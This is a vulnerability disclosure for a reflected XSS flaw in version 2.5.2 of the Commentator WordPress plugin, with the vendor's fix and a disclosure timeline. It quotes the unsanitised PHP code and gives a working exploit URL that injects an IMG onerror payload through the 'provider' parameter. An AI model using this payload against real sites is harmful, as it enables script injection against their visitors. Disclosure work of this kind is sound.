Commentator WordPress Plugin XSS Vulnerability

## FULL DISCLOSURE

#Product : Commentator WordPress Plugin
#Exploit Author : Rahul Pratap Singh
#Version : 2.5.2
#Home page Link : http://codecanyon.net/item/commentator-wordpress-plugin/6425752
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 13/Jan/2016

XSS Vulnerability:
—————————————-
Description:
—————————————-
“provider” parameter is not sanitized that leads to Reflected XSS.

—————————————-
Vulnerable Code:
—————————————-
file: commentator.php

line:441
$provider_name = $_REQUEST[“provider”];

line:544
<div id=”commentator-social-signin” class=”commentator-<?php echo $provider_name; ?>”>

—————————————-
Exploit:
—————————————-
/wp-admin/admin-ajax.php?action=commentator_social_signin&provider=facebook”>  <IMG%20SRC=axc%20onerror=alert(1)>

—————————————-
POC:
—————————————-
commentatorxsspoc

Fix:
Update to 2.5.3

Disclosure Timeline:
reported to vendor : 9/1/2016
vendor response : 11/1/2016
vendor acknowledged : 11/1/2016
vendor deployed a patch: 11/1/2016

Pub Ref:
http://codecanyon.net/item/commentator-wordpress-plugin/6425752